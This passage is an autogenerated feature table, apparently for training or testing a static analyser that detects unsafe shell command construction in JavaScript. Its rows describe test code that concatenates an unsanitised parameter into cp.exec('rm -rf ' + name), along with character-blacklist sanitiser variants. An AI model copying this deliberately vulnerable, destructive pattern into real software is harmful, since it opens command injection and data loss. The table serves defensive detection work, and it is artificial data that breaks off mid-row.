Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:10:193:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:10:193:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:10:193:18 | "rm -rf " | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:10:193:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:10:193:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:10:193:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:10:193:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:10:193:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:10:193:25 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:10:193:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:10:193:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:10:193:25 | "rm -rf " + name | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:10:193:25 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:10:193:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:22:193:25 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:22:193:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:22:193:25 | name | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:22:193:25 | name | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:22:193:25 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:193:22:193:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:1:196:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:1:196:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:1:196:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:1:196:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:1:196:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:1:196:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:1:196:31 | module. ... OfChars | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:1:196:31 | module. ... OfChars | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:1:196:31 | module. ... OfChars | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:1:204:1 | module. ... OK\\n\\t}\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:1:204:1 | module. ... OK\\n\\t}\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:1:204:1 | module. ... OK\\n\\t}\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:8:196:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:8:196:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:8:196:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:16:196:31 | blacklistOfChars | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:16:196:31 | blacklistOfChars | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:16:196:31 | blacklistOfChars | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:196:34 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:196:34 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:196:34 | cp | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:196:34 | cp | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:196:34 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:196:34 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:196:34 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:196:34 | this | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:196:34 | this | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:196:34 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:204:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:204:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:204:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:204:1 | 'arguments' object of anonymous function | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:204:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:204:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:204:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:204:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:204:1 | exceptional return of anonymous function | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:204:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:204:1 | functio ... OK\\n\\t}\\n} | assignedToPropName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:204:1 | functio ... OK\\n\\t}\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:204:1 | functio ... OK\\n\\t}\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:204:1 | functio ... OK\\n\\t}\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:204:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:204:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:204:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name /[^A-Za-z0-9_\\/:=-]/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:204:1 | return of anonymous function | enclosingFunctionName | blacklistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:35:204:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:196:45:196:48 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 